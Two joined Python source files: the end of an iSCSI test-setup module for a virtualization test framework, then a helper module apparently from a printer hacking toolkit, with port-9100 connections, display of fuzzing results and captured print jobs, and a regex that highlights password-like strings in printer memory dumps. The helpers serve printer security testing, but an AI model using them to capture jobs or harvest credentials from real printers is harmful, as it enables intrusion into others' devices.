        if self.chap_user in self.get_chap_accounts():
            cmd = "tgtadm --lld iscsi --op delete --mode account"
            cmd += " --user %s" % self.chap_user
            process.system(cmd)

    def get_target_account_info(self):
        """
        Get the target account information

        Returns the account names bound to self.target (may be empty).
        """
        cmd = "tgtadm --lld iscsi --mode target --op show"
        target_info = process.system_output(cmd)
        pattern = r"Target\s+\d:\s+%s" % self.target
        pattern += ".*Account information:\s(.*)ACL information"
        try:
            target_account = re.findall(pattern, target_info,
                                        re.S)[0].strip().splitlines()
        except IndexError:
            target_account = []
        return map(str.strip, target_account)

    def set_chap_auth_target(self):
        """
        Set CHAP authentication on a target, it will require authentication
        before an initiator is allowed to log in and access devices.
        """
        if self.chap_user not in self.get_chap_accounts():
            self.add_chap_account()
        if self.chap_user in self.get_target_account_info():
            logging.debug("Target %s already has account %s", self.target,
                          self.chap_user)
        else:
            cmd = "tgtadm --lld iscsi --op bind --mode account"
            cmd += " --tid %s --user %s" % (self.emulated_id, self.chap_user)
            process.system(cmd)

    def export_target(self):
        """
        Export target in localhost for emulated iscsi

        Creates the backing image if needed, registers the target with a
        free tid, attaches the image as a LUN and (optionally) sets up
        CHAP authentication.
        """
        selinux_mode = None
        if not os.path.isfile(self.emulated_image):
            process.system(self.create_cmd)
        else:
            emulated_image_size = os.path.getsize(self.emulated_image) / 1024
            if emulated_image_size != self.emulated_expect_size:
                # No need to remvoe, rebuild is fine
                process.system(self.create_cmd)
        cmd = "tgtadm --lld iscsi --mode target --op show"
        try:
            output = process.system_output(cmd)
        except process.CmdError:
            # tgtd may not be running yet.
            process.system("service tgtd restart")
            output = process.system_output(cmd)
        if not re.findall("%s$" % self.target, output, re.M):
            logging.debug("Need to export target in host")
            # Set selinux to permissive mode to make sure iscsi target
            # export successfully
            if utils_selinux.is_enforcing():
                selinux_mode = utils_selinux.get_status()
                utils_selinux.set_status("permissive")
            # Pick the lowest target id not already in use.
            output = process.system_output(cmd)
            used_id = re.findall("Target\s+(\d+)", output)
            emulated_id = 1
            while str(emulated_id) in used_id:
                emulated_id += 1
            self.emulated_id = str(emulated_id)
            cmd = "tgtadm --mode target --op new --tid %s" % self.emulated_id
            cmd += " --lld iscsi --targetname %s" % self.target
            process.system(cmd)
            cmd = "tgtadm --lld iscsi --op bind --mode target "
            cmd += "--tid %s -I ALL" % self.emulated_id
            process.system(cmd)
        else:
            # Target already exported: recover its id from the listing.
            target_strs = re.findall("Target\s+(\d+):\s+%s$" %
                                     self.target, output, re.M)
            self.emulated_id = target_strs[0].split(':')[0].split()[-1]
        cmd = "tgtadm --lld iscsi --mode target --op show"
        try:
            output = process.system_output(cmd)
        except process.CmdError:  # In case service stopped
            process.system("service tgtd restart")
            output = process.system_output(cmd)
        # Create a LUN with emulated image
        if re.findall(self.emulated_image, output, re.M):
            # Exist already
            logging.debug("Exported image already exists.")
            self.export_flag = True
        else:
            # Use the LUN count of this target (or globally as a fallback)
            # as the next free LUN number.
            tgt_str = re.search(r'.*(Target\s+\d+:\s+%s\s*.*)$' % self.target,
                                output, re.DOTALL)
            if tgt_str:
                luns = len(re.findall("\s+LUN:\s(\d+)",
                                      tgt_str.group(1), re.M))
            else:
                luns = len(re.findall("\s+LUN:\s(\d+)", output, re.M))
            cmd = "tgtadm --mode logicalunit --op new "
            cmd += "--tid %s --lld iscsi " % self.emulated_id
            cmd += "--lun %s " % luns
            cmd += "--backing-store %s" % self.emulated_image
            process.system(cmd)
            self.export_flag = True
            self.luns = luns
        # Restore selinux
        if selinux_mode is not None:
            utils_selinux.set_status(selinux_mode)
        if self.chap_flag:
            # Set CHAP authentication on the exported target
            self.set_chap_auth_target()
            # Set CHAP authentication for initiator to login target
            if self.portal_visible():
                self.set_chap_auth_initiator()

    def delete_target(self):
        """
        Delete target from host.
        """
        cmd = "tgtadm --lld iscsi --mode target --op show"
        output = process.system_output(cmd)
        if re.findall("%s$" % self.target, output, re.M):
            if self.emulated_id:
                cmd = "tgtadm --lld iscsi --mode target --op delete "
                cmd += "--tid %s" % self.emulated_id
                process.system(cmd)
        if self.restart_tgtd:
            cmd = "service tgtd restart"
            process.system(cmd)
class IscsiLIO(_IscsiComm):
"""
iscsi support class for LIO backend used in RHEL7.
"""
    def __init__(self, params, root_dir):
        """
        initialize LIO backend for iSCSI

        :param params: parameters dict for LIO backend of iSCSI
        """
        super(IscsiLIO, self).__init__(params, root_dir)
    def get_target_id(self):
        """
        Get target id from image name.

        Scans ``targetcli ls /iscsi`` for target entries, then inspects each
        target's LUNs for the emulated image.  Returns the matching target
        IQN, or None when no LUN references the image.
        """
        cmd = "targetcli ls /iscsi 1"
        target_info = process.system_output(cmd)
        target = None
        for line in re.split("\n", target_info)[1:]:
            if re.findall("o-\s\S+\s[\.]+\s\[TPGs:\s\d\]$", line):
                # eg: iqn.2015-05.com.example:iscsi.disk
                try:
                    target = re.findall("iqn[\.]\S+:\S+", line)[0]
                except IndexError:
                    logging.info("No found target in %s", line)
                    continue
            else:
                continue
            cmd = "targetcli ls /iscsi/%s/tpg1/luns" % target
            luns_info = process.system_output(cmd)
            for lun_line in re.split("\n", luns_info):
                if re.findall("o-\slun\d+", lun_line):
                    if self.emulated_image in lun_line:
                        break
                    else:
                        # Not our image: forget this target candidate.
                        target = None
        return target
    def set_chap_acls_target(self):
        """
        set CHAP(acls) authentication on a target.
        it will require authentication
        before an initiator is allowed to log in and access devices.

        notice:
            Individual ACL entries override common TPG Authentication,
            which can be set by set_chap_auth_target().
        """
        # Enable ACL nodes (disable auto-generated ACLs).
        acls_cmd = "targetcli /iscsi/%s/tpg1/ " % self.target
        attr_cmd = "set attribute generate_node_acls=0"
        process.system(acls_cmd + attr_cmd)
        # Create user and allow access; the ACL node is named
        # "<iqn prefix>:client".
        acls_cmd = ("targetcli /iscsi/%s/tpg1/acls/ create %s:client"
                    % (self.target, self.target.split(":")[0]))
        output = process.system_output(acls_cmd)
        if "Created Node ACL" not in output:
            raise exceptions.TestFail("Failed to create ACL. (%s)" % output)
        comm_cmd = ("targetcli /iscsi/%s/tpg1/acls/%s:client/"
                    % (self.target, self.target.split(":")[0]))
        # Set userid
        userid_cmd = "%s set auth userid=%s" % (comm_cmd, self.chap_user)
        output = process.system_output(userid_cmd)
        if self.chap_user not in output:
            raise exceptions.TestFail("Failed to set user. (%s)" % output)
        # Set password
        passwd_cmd = "%s set auth password=%s" % (comm_cmd, self.chap_passwd)
        output = process.system_output(passwd_cmd)
        if self.chap_passwd not in output:
            raise exceptions.TestFail("Failed to set password. (%s)" % output)
        # Save configuration
        process.system("targetcli / saveconfig")
    def set_chap_auth_target(self):
        """
        set up authentication information for every single initiator,
        which provides the capability to define common login information
        for all Endpoints in a TPG
        """
        # Demo-mode write access + auto-generated, cached ACLs: every
        # initiator authenticates with the TPG-wide credentials below.
        auth_cmd = "targetcli /iscsi/%s/tpg1/ " % self.target
        attr_cmd = ("set attribute %s %s %s" %
                    ("demo_mode_write_protect=0",
                     "generate_node_acls=1",
                     "cache_dynamic_acls=1"))
        process.system(auth_cmd + attr_cmd)
        # Set userid
        userid_cmd = "%s set auth userid=%s" % (auth_cmd, self.chap_user)
        output = process.system_output(userid_cmd)
        if self.chap_user not in output:
            raise exceptions.TestFail("Failed to set user. (%s)" % output)
        # Set password
        passwd_cmd = "%s set auth password=%s" % (auth_cmd, self.chap_passwd)
        output = process.system_output(passwd_cmd)
        if self.chap_passwd not in output:
            raise exceptions.TestFail("Failed to set password. (%s)" % output)
        # Save configuration
        process.system("targetcli / saveconfig")
    def export_target(self):
        """
        Export target in localhost for emulated iscsi

        Creates (or rebuilds) the backing image file, then — if the IQN is
        not already exported — creates a fileio backstore, target, portal(s)
        and LUN via targetcli, optionally configures CHAP, saves the config
        and restarts iscsid.  Sets self.export_flag on a fresh export.
        SELinux is temporarily switched to permissive during the export and
        restored afterwards.
        """
        selinux_mode = None
        # create image disk
        if not os.path.isfile(self.emulated_image):
            process.system(self.create_cmd)
        else:
            # NOTE(review): on Python 3 this is float division; comparison
            # still works for exact multiples of 1024 — confirm intended.
            emulated_image_size = os.path.getsize(self.emulated_image) / 1024
            if emulated_image_size != self.emulated_expect_size:
                # No need to remove, rebuild is fine
                process.system(self.create_cmd)
        # confirm if the target exists and create iSCSI target
        cmd = "targetcli ls /iscsi 1"
        output = process.system_output(cmd)
        if not re.findall("%s$" % self.target, output, re.M):
            logging.debug("Need to export target in host")
            # Set selinux to permissive mode to make sure
            # iscsi target export successfully
            if utils_selinux.is_enforcing():
                selinux_mode = utils_selinux.get_status()
                utils_selinux.set_status("permissive")
            # In fact, We've got two options here
            #
            # 1) Create a block backstore that usually provides the best
            #    performance. We can use a block device like /dev/sdb or
            #    a logical volume previously created,
            #     (lvcreate -name lv_iscsi -size 1G vg)
            # 2) Create a fileio backstore,
            #    which enables the local file system cache.
            #
            # This class Only works for emulated iscsi device,
            # So fileio backstore is enough and safe.
            # Create a fileio backstore
            device_cmd = ("targetcli /backstores/fileio/ create %s %s" %
                          (self.device, self.emulated_image))
            output = process.system_output(device_cmd)
            if "Created fileio" not in output:
                raise exceptions.TestFail("Failed to create fileio %s. (%s)" %
                                          (self.device, output))
            # Create an IQN with a target named target_name
            target_cmd = "targetcli /iscsi/ create %s" % self.target
            output = process.system_output(target_cmd)
            if "Created target" not in output:
                raise exceptions.TestFail("Failed to create target %s. (%s)" %
                                          (self.target, output))
            check_portal = "targetcli /iscsi/%s/tpg1/portals ls" % self.target
            portal_info = process.system_output(check_portal)
            if "0.0.0.0:3260" not in portal_info:
                # Create portal
                # 0.0.0.0 means binding to INADDR_ANY
                # and using default IP port 3260
                portal_cmd = ("targetcli /iscsi/%s/tpg1/portals/ create %s"
                              % (self.target, "0.0.0.0"))
                output = process.system_output(portal_cmd)
                if "Created network portal" not in output:
                    raise exceptions.TestFail("Failed to create portal. (%s)" %
                                              output)
            # ipv6 portals are not created by default; add one when the
            # configured portal address is ipv6 and not present yet.
            if ("ipv6" == utils_net.IPAddress(self.portal_ip).version and
                    self.portal_ip not in portal_info):
                # Ipv6 portal address can't be created by default,
                # create ipv6 portal if needed.
                portal_cmd = ("targetcli /iscsi/%s/tpg1/portals/ create %s"
                              % (self.target, self.portal_ip))
                output = process.system_output(portal_cmd)
                if "Created network portal" not in output:
                    raise exceptions.TestFail("Failed to create portal. (%s)" %
                                              output)
            # Create lun
            lun_cmd = "targetcli /iscsi/%s/tpg1/luns/ " % self.target
            dev_cmd = "create /backstores/fileio/%s" % self.device
            output = process.system_output(lun_cmd + dev_cmd)
            luns = re.findall(r"Created LUN (\d+).", output)
            if not luns:
                raise exceptions.TestFail("Failed to create lun. (%s)" %
                                          output)
            self.luns = luns[0]
            # Set firewall if it's enabled
            output = process.system_output("firewall-cmd --state",
                                           ignore_status=True)
            if re.findall("^running", output, re.M):
                # firewall is running
                process.system("firewall-cmd --permanent --add-port=3260/tcp")
                process.system("firewall-cmd --reload")
            # Restore selinux
            if selinux_mode is not None:
                utils_selinux.set_status(selinux_mode)
            self.export_flag = True
        else:
            logging.info("Target %s has already existed!" % self.target)
        if self.chap_flag:
            # Set CHAP authentication on the exported target
            self.set_chap_auth_target()
            # Set CHAP authentication for initiator to login target
            if self.portal_visible():
                self.set_chap_auth_initiator()
        else:
            # To enable that so-called "demo mode" TPG operation,
            # disable all authentication for the corresponding Endpoint.
            # which means grant access to all initiators,
            # so that they can access all LUNs in the TPG
            # without further authentication.
            auth_cmd = "targetcli /iscsi/%s/tpg1/ " % self.target
            attr_cmd = ("set attribute %s %s %s %s" %
                        ("authentication=0",
                         "demo_mode_write_protect=0",
                         "generate_node_acls=1",
                         "cache_dynamic_acls=1"))
            output = process.system_output(auth_cmd + attr_cmd)
            logging.info("Define access rights: %s" % output)
            # Save configuration
            process.system("targetcli / saveconfig")
        # Restart iSCSI service
        process.system("systemctl restart iscsid.service")
    def delete_target(self):
        """
        Delete target from host.

        Removes the fileio backstore (if self.device is set and listed)
        and the IQN (if listed), then saves the targetcli configuration
        so the deletion persists.  Best-effort: items that are not
        present are silently skipped.
        """
        # Delete block
        if self.device is not None:
            cmd = "targetcli /backstores/fileio ls"
            output = process.system_output(cmd)
            if re.findall("%s" % self.device, output, re.M):
                dev_del = ("targetcli /backstores/fileio/ delete %s"
                           % self.device)
                process.system(dev_del)
        # Delete IQN
        cmd = "targetcli ls /iscsi 1"
        output = process.system_output(cmd)
        if re.findall("%s" % self.target, output, re.M):
            del_cmd = "targetcli /iscsi delete %s" % self.target
            process.system(del_cmd)
        # Save deleted configuration to avoid restoring
        cmd = "targetcli / saveconfig"
        process.system(cmd)
class Iscsi(object):
    """
    Basic iSCSI support class,
    which will handle the emulated iscsi export and
    access to both real iscsi and emulated iscsi device.
    The class support different kinds of iSCSI backend (TGT and LIO),
    and return ISCSI instance.
    """

    @staticmethod
    def create_iSCSI(params, root_dir=None):
        """
        Factory: pick the iSCSI backend available on this host.

        :param params: test parameters passed through to the backend class.
        :param root_dir: working directory; defaults to the *current*
                         tmp dir.  (The old signature evaluated
                         data_dir.get_tmp_dir() once at import time,
                         freezing a stale path for the whole process.)
        :return: IscsiTGT or IscsiLIO instance, or None when neither
                 backend's tools are installed.
        """
        if root_dir is None:
            # Resolve lazily so each call sees the current tmp dir.
            root_dir = data_dir.get_tmp_dir()
        iscsi_instance = None
        try:
            # TGT backend needs both iscsiadm and tgtadm.
            path.find_command("iscsiadm")
            path.find_command("tgtadm")
            iscsi_instance = IscsiTGT(params, root_dir)
        except path.CmdNotFoundError:
            try:
                # LIO backend needs iscsiadm and targetcli.
                path.find_command("iscsiadm")
                path.find_command("targetcli")
                iscsi_instance = IscsiLIO(params, root_dir)
            except path.CmdNotFoundError:
                pass
        return iscsi_instance
| vipmike007/avocado-vt | virttest/iscsi.py | Python | gpl-2.0 | 29,173 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import print_function
# python standard library
from socket import socket
import sys, os, re, stat, math, time, datetime
import importlib
# third party modules
try: # unicode monkeypatch for windoze
    import win_unicode_console
    win_unicode_console.enable()
except Exception:
    # narrowed from a bare 'except:' so SystemExit/KeyboardInterrupt escape
    msg = "Please install the 'win_unicode_console' module."
    if os.name == 'nt': print(msg)
try: # os independent color support
    from colorama import init, Fore, Back, Style
    init() # required to get colors on windoze
except ImportError:
    msg = "Please install the 'colorama' module for color support."
    # poor man's colored output (ANSI)
    class Back():
        BLUE = '\x1b[44m' if os.name == 'posix' else ''
        CYAN = '\x1b[46m' if os.name == 'posix' else ''
        GREEN = '\x1b[42m' if os.name == 'posix' else ''
        MAGENTA = '\x1b[45m' if os.name == 'posix' else ''
        RED = '\x1b[41m' if os.name == 'posix' else ''
        # BUGFIX: output().discover() uses Back.YELLOW; the fallback lacked
        # it and raised AttributeError whenever colorama was not installed.
        YELLOW = '\x1b[43m' if os.name == 'posix' else ''
    class Fore():
        BLUE = '\x1b[34m' if os.name == 'posix' else ''
        CYAN = '\x1b[36m' if os.name == 'posix' else ''
        MAGENTA = '\x1b[35m' if os.name == 'posix' else ''
        YELLOW = '\x1b[33m' if os.name == 'posix' else ''
    class Style():
        DIM = '\x1b[2m' if os.name == 'posix' else ''
        BRIGHT = '\x1b[1m' if os.name == 'posix' else ''
        RESET_ALL = '\x1b[0m' if os.name == 'posix' else ''
        NORMAL = '\x1b[22m' if os.name == 'posix' else ''
    print(Back.RED + msg + Style.RESET_ALL)
# ----------------------------------------------------------------------
# return first item of list or alternative
def item(mylist, alternative=""):
    """Return the first element of *mylist*, or *alternative* if empty."""
    for element in mylist:
        return element
    return alternative
# split list into chunks of equal size
def chunks(l, n):
    """Yield successive slices of *l*, each at most *n* items long."""
    start = 0
    while start < len(l):
        yield l[start:start + n]
        start += n
# ----------------------------------------------------------------------
class log():
    """Raw-data logfile helpers; errors are reported, never raised."""
    # open logfile
    def open(self, filename):
        # Opened in binary mode: callers are expected to pass bytes to
        # write().  Returns None on failure instead of raising.
        try:
            return open(filename, mode='wb')
        except IOError as e:
            output().errmsg("Cannot open logfile", e)
            return None
    # write raw data to logfile
    def write(self, logfile, data):
        # logfile open and data non-empty
        if logfile and data:
            try:
                logfile.write(data)
            except IOError as e:
                output().errmsg("Cannot log", e)
    # write comment to logfile
    def comment(self, logfile, line):
        comment = "%" + ("[ " + line + " ]").center(72, '-')
        # NOTE(review): this passes a str to a file opened 'wb'; on
        # Python 3 that raises TypeError unless encoded — confirm callers.
        self.write(logfile, os.linesep + comment + os.linesep)
    # close logfile
    def close(self, logfile):
        try:
            logfile.close()
        except IOError as e:
            output().errmsg("Cannot close logfile", e)
# ----------------------------------------------------------------------
class output():
    """Colored console output helpers for debug traffic, listings,
    hexdumps and status lines."""
    # show send commands (debug mode)
    def send(self, str, mode):
        if str: print(Back.CYAN + str + Style.RESET_ALL)
        if str and mode == 'hex':
            print(Fore.CYAN + conv().hex(str, ':') + Style.RESET_ALL)
    # show recv commands (debug mode)
    def recv(self, str, mode):
        if str: print(Back.MAGENTA + str + Style.RESET_ALL)
        if str and mode == 'hex':
            print(Fore.MAGENTA + conv().hex(str, ':') + Style.RESET_ALL)
    # show information
    def info(self, msg, eol=None):
        if msg: print(Back.BLUE + msg + Style.RESET_ALL, end=eol)
        sys.stdout.flush()
    # show raw data
    def raw(self, msg, eol=None):
        if msg: print(Fore.YELLOW + msg + Style.RESET_ALL, end=eol)
        sys.stdout.flush()
    # show chit-chat
    def chitchat(self, msg, eol=None):
        if msg: print(Style.DIM + msg + Style.RESET_ALL, end=eol)
        sys.stdout.flush()
    # show warning message
    def warning(self, msg):
        if msg: print(Back.RED + msg + Style.RESET_ALL)
    # show green message
    def green(self, msg):
        if msg: print(Back.GREEN + msg + Style.RESET_ALL)
    # show error message
    def errmsg(self, msg, info=""):
        info = str(info).strip()
        if info: # monkeypatch to make python error message less ugly
            info = item(re.findall('Errno -?\d+\] (.*)', info), '') or info.splitlines()[-1]
            info = Style.RESET_ALL + Style.DIM + " (" + info.strip('<>') + ")" + Style.RESET_ALL
        if msg: print(Back.RED + msg + info)
    # show printer and status
    def discover(self, xxx_todo_changeme):
        # (2to3 artifact: tuple parameter unpacked manually)
        (ipaddr, (device, uptime, status, prstat)) = xxx_todo_changeme
        ipaddr = output().strfit(ipaddr, 15)
        device = output().strfit(device, 27)
        uptime = output().strfit(uptime, 8)
        status = output().strfit(status, 23)
        if device.strip() != 'device': device = Style.BRIGHT + device + Style.NORMAL
        if prstat == '1': status = Back.GREEN + status + Back.BLUE # unknown
        if prstat == '2': status = Back.GREEN + status + Back.BLUE # running
        if prstat == '3': status = Back.YELLOW + status + Back.BLUE # warning
        if prstat == '4': status = Back.GREEN + status + Back.BLUE # testing
        if prstat == '5': status = Back.RED + status + Back.BLUE # down
        line = (ipaddr, device, uptime, status)
        output().info('%-15s %-27s %-8s %-23s' % line)
    # recursively list files
    def psfind(self, name):
        vol = Style.DIM + Fore.YELLOW + item(re.findall("^(%.*%)", name)) + Style.RESET_ALL
        name = Fore.YELLOW + const.SEP + re.sub("^(%.*%)", '', name) + Style.RESET_ALL
        print("%s %s" % (vol, name))
    # show directory listing
    def psdir(self, isdir, size, mtime, name, otime):
        otime = Style.DIM + "(created " + otime + ")" + Style.RESET_ALL
        vol = Style.DIM + Fore.YELLOW + item(re.findall("^(%.*%)", name)) + Style.RESET_ALL
        name = re.sub("^(%.*%)", '', name) # remove volume information from filename
        name = Style.BRIGHT + Fore.BLUE + name + Style.RESET_ALL if isdir else name
        if isdir: print("d %8s %s %s %s %s" % (size, mtime, otime, vol, name))
        else: print("- %8s %s %s %s %s" % (size, mtime, otime, vol, name))
    # show directory listing
    def pjldir(self, name, size):
        name = name if size else Style.BRIGHT + Fore.BLUE + name + Style.RESET_ALL
        if size: print("- %8s %s" % (size, name))
        else: print("d %8s %s" % ("-", name))
    # show directory listing
    def pcldir(self, size, mtime, id, name):
        id = Style.DIM + "(macro id: " + id + ")" + Style.RESET_ALL
        print("- %8s %s %s %s" % (size, mtime, id, name))
    # show output from df
    def df(self, args):
        self.info("%-16s %-11s %-11s %-9s %-10s %-8s %-9s %-10s %-10s" % args)
    # show fuzzing results
    def fuzzed(self, path, cmd, opt):
        opt1, opt2, opt3 = opt
        if isinstance(opt1, bool): opt1 = (Back.GREEN + str(opt1) + Back.BLUE + " ")\
            if opt1 else (Back.RED + str(opt1) + Back.BLUE + " ")
        if isinstance(opt2, bool): opt2 = (Back.GREEN + str(opt2) + Back.BLUE + " ")\
            if opt2 else (Back.RED + str(opt2) + Back.BLUE + " ")
        if isinstance(opt3, bool): opt3 = (Back.GREEN + str(opt3) + Back.BLUE + " ")\
            if opt3 else (Back.RED + str(opt3) + Back.BLUE + " ")
        opt = opt1, opt2, opt3
        self.info("%-35s %-12s %-7s %-7s %-7s" % ((path, cmd) + opt))
    # show captured jobs
    def joblist(self, xxx_todo_changeme1):
        # (2to3 artifact: tuple parameter unpacked manually)
        (date, size, user, name, soft) = xxx_todo_changeme1
        user = output().strfit(user, 13)
        name = output().strfit(name, 22)
        soft = output().strfit(soft, 20)
        line = (date, size, user, name, soft)
        output().info('%-12s %5s %-13s %-22s %-20s' % line)
    # show ascii only
    def ascii(self, data):
        data = re.sub(r"(\x00){10}", "\x00", data) # shorten nullbyte streams
        data = re.sub(r"([^ -~])", ".", data) # replace non-printable chars
        self.raw(data, "")
    # show binary dump
    def dump(self, data):
        # experimental regex to match sensitive strings like passwords
        data = re.sub(r"[\x00-\x06,\x1e]([!-~]{6,}?(?!\\0A))\x00{16}", "START" + r"\1" + "STOP", data)
        data = re.sub(r"\00+", "\x00", data) # ignore nullbyte streams
        data = re.sub(r"(\x00){10}", "\x00", data) # ignore nullbyte streams
        data = re.sub(r"([\x00-\x1f,\x7f-\xff])", ".", data)
        data = re.sub(r"START([!-~]{6,}?)STOP", Style.RESET_ALL + Back.BLUE + r"\1" + Style.RESET_ALL + Fore.YELLOW, data)
        self.raw(data, "")
    # dump ps dictionary
    def psdict(self, data, indent=''):
        importlib.reload(sys) # workaround for non-ascii output
        # NOTE(review): sys.setdefaultencoding() does not exist on Python 3
        # — this line raises AttributeError there; confirm target interpreter.
        sys.setdefaultencoding('UTF8')
        # convert list to dictionary with indices as keys
        if isinstance(data, list):
            data = dict(enumerate(data))
        # data now is expected to be a dictionary
        if len(list(data.keys())) > 0: last = sorted(data.keys())[-1]
        for key, val in sorted(data.items()):
            type = val['type'].replace('type', '')
            value = val['value']
            perms = val['perms']
            recursion = False
            # current enty is a dictionary
            if isinstance(value, dict):
                value, recursion = '', True
            # current enty is a ps array
            if isinstance(value, list):
                try: # array contains only atomic values
                    value = ' '.join(x['value'] for x in value)
                except: # array contains further list or dict
                    # value = sum(val['value'], [])
                    value, recursion = '', True
            # value = value.encode('ascii', errors='ignore')
            node = '┬' if recursion else '─'
            edge = indent + ('└' if key == last else '├')
            # output current node in dictionary
            print("%s%s %-3s %-11s %-30s %s" % (edge, node, perms, type, key, value))
            if recursion: # ...
                self.psdict(val['value'], indent + (' ' if key == last else '│'))
    # show some information
    def psonly(self):
        self.chitchat("Info: This only affects jobs printed by a PostScript driver")
    # countdown from sec to zero
    def countdown(self, msg, sec, cmd):
        # Returns True on completion, None if interrupted with Ctrl-C.
        try:
            sys.stdout.write(msg)
            for x in reversed(list(range(1, sec+1))):
                sys.stdout.write(" " + str(x))
                sys.stdout.flush()
                time.sleep(1)
            print(" KABOOM!")
            return True
        except KeyboardInterrupt:
            print("")
    # show horizontal line
    def hline(self, len=72):
        self.info("─" * len)
    # crop/pad string to fixed length
    def strfit(self, str, max):
        str = str.strip() or "-"
        if str.startswith('(') and str.endswith(')'): str = str[1:-1]
        # crop long strings
        if len(str) > max:
            str = str[0:max-1] + "…"
        # pad short strings
        return str.ljust(max)
# ----------------------------------------------------------------------
class conv():
    """Assorted conversion helpers: timestamps, dates, sizes, encodings."""
    # return current time
    def now(self):
        """Current unix timestamp as an integer."""
        return int(time.time())
    # return time elapsed since unix epoch
    def elapsed(self, date, div=1, short=False):
        """Seconds (optionally divided) rendered as [D days, ]H:MM:SS."""
        delta = datetime.timedelta(seconds=int(date) / div)
        text = str(delta)
        return text.split(",")[0] if short else text
    # return date dependend on current year
    def lsdate(self, date):
        """ls-style date: clock time for this year's stamps, else the year."""
        this_year = datetime.datetime.now().year
        stamp_year = datetime.datetime.fromtimestamp(date).year
        prefix = '%b %e ' if os.name == 'posix' else '%b %d '
        fmt = prefix + "%H:%M" if this_year == stamp_year else prefix + " %Y"
        return time.strftime(fmt, time.localtime(date))
    # return date plus/minus given seconds
    def timediff(self, seconds):
        """Date *seconds* milliseconds away from now, ls-formatted."""
        offset = self.int(seconds) / 1000
        return self.lsdate(self.now() + offset)
    # convert size to human readble value
    def filesize(self, num):
        """Human readable size up to the megabyte range (4-char field)."""
        value = self.int(num)
        for unit in ('B', 'K', 'M'):
            if abs(value) < 1024.0:
                fmt = "%4.1f%s" if unit == 'M' else "%4.0f%s"
                return fmt % (value, unit)
            value /= 1024.0
    # remove carriage return from line breaks
    def nstrip(self, data):
        """Normalize CRLF line endings to LF."""
        return data.replace('\r\n', '\n')
    # convert string to hexdecimal
    def hex(self, data, sep=''):
        """Hex-encode *data* character by character, joined with *sep*."""
        return sep.join("%02x" % ord(char) for char in data)
    # convert to ascii character
    def chr(self, num):
        """Character for the (possibly string-typed) code point *num*."""
        return chr(self.int(num))
    # convert to integer or zero
    def int(self, num):
        """int(num), falling back to 0 when the value does not parse."""
        try:
            return int(num)
        except ValueError:
            return 0
# ----------------------------------------------------------------------
class file():
    """Thin wrappers around local file I/O; errors are reported via
    output().errmsg() instead of being raised."""
    # read from local file
    def read(self, path):
        try:
            with open(path, mode='rb') as handle:
                return handle.read()
        except IOError as e:
            output().errmsg("Cannot read from file", e)
    # write to local file
    def write(self, path, data, m='wb'):
        try:
            with open(path, mode=m) as handle:
                handle.write(data)
        except IOError as e:
            output().errmsg("Cannot write to file", e)
    # append to local file
    def append(self, path, data):
        self.write(path, data, 'ab+')
# ----------------------------------------------------------------------
class conn(object):
    """Printer connection over a character device or a TCP socket,
    with optional hexdump debugging and delimiter-based receiving."""
    # create debug connection object
    def __init__(self, mode, debug, quiet):
        self.mode = mode       # 'ps', 'pjl' or 'pcl' — drives parsing below
        self.debug = debug
        self.quiet = quiet
        self._file = None      # fd when the target is a char device
        self._sock = socket()  # otherwise an ipv4 TCP socket
    # open connection
    def open(self, target, port=9100):
        # target is a character device
        if os.path.exists(target) \
            and stat.S_ISCHR(os.stat(target).st_mode):
            self._file = os.open(target, os.O_RDWR)
        # treat target as ipv4 socket
        else:
            m = re.search('^(.+?):([0-9]+)$', target)
            if m:
                [target, port] = m.groups()
                port = int(port)
            self._sock.connect((target, port))
    # close connection
    def close(self, *arg):
        # close file descriptor
        if self._file: os.close(self._file)
        # close inet socket
        else: self._sock.close()
    # set timeout
    def timeout(self, *arg):
        self._sock.settimeout(*arg)
    # send data
    def send(self, data):
        if self.debug: output().send(self.beautify(data), self.debug)
        # send data to device
        # NOTE(review): the device path writes *data* as-is while the socket
        # path encodes it — callers must pass the right type; confirm.
        if self._file: return os.write(self._file, data)
        # send data to socket
        elif self._sock: return self._sock.sendall(data.encode())
    # receive data
    def recv(self, bytes):
        # receive data from device
        if self._file: data = os.read(self._file, bytes).decode()
        # receive data from socket
        else: data = self._sock.recv(bytes).decode()
        # output recv data when in debug mode
        if self.debug: output().recv(self.beautify(data), self.debug)
        return data
    # so-many-seconds-passed bool condition
    def past(self, seconds, watchdog):
        return int(watchdog * 100) % (seconds * 100) == 0
    # connection-feels-slow bool condition
    def slow(self, limit, watchdog):
        return not (self.quiet or self.debug) and watchdog > limit
    # receive data until a delimiter is reached
    def recv_until(self, delimiter, fb=True, crop=True, binary=False):
        """Accumulate recv() data until *delimiter* matches; guards against
        silent stalls with a software watchdog.  Returns the (optionally
        cropped and whitespace-stripped) payload."""
        data = ""
        sleep = 0.01 # pause in recv loop
        limit = 3.0 # max watchdog overrun
        wd = 0.0 # watchdog timeout counter
        r = re.compile(delimiter, re.DOTALL)
        s = re.compile("^\x04?\x0d?\x0a?" + delimiter, re.DOTALL)
        #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
        while not r.search(data):
            data += self.recv(4096) # receive actual data
            # snapshot (wd, len) every *limit* seconds — first pass included
            if self.past(limit, wd): wd_old, bytes = wd, len(data)
            wd += sleep # workaround for endless loop w/o socket timeout
            time.sleep(sleep) # happens on some devices - python socket error?
            # timeout plus it seems we are not receiving data anymore
            if wd > self._sock.gettimeout() and wd >= wd_old + limit:
                if len(data) == bytes:
                    output().errmsg("Receiving data failed", "watchdog timeout")
                break
            # visual feedback on large/slow data transfers
            if self.slow(limit, wd) and self.past(0.1, wd) and len(data) > 0:
                output().chitchat(str(len(data)) + " bytes received\r", '')
        #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
        # clear current line from 'so-many bytes received' chit-chat
        if self.slow(limit, wd): output().chitchat(' ' * 24 + "\r", '')
        # warn if feedback expected but response empty (= delimiter only)
        # this also happens for data received out of order (e.g. brother)
        if fb and s.search(data): output().chitchat("No data received.")
        # remove delimiter itself from data
        if crop: data = r.sub('', data)
        # crop uel sequence at the beginning
        data = re.sub(r'(^' + const.UEL + ')', '', data)
        '''
        ┌─────────────────────────────────────────────────────────────────────────┐
        │ delimiters -- note that carriage return (0d) is optional in ps/pjl │
        ├─────────────────────────┬─────────────────────────┬─────────────────────┤
        │ │ PJL │ PostScript │
        ├─────────────────────────┼─────────┬───────────────┼────────┬────────────┤
        │ │ send │ recv │ send │ recv │
        ├─────────────────────────┼─────────┼───────────────┼────────┼────────────┤
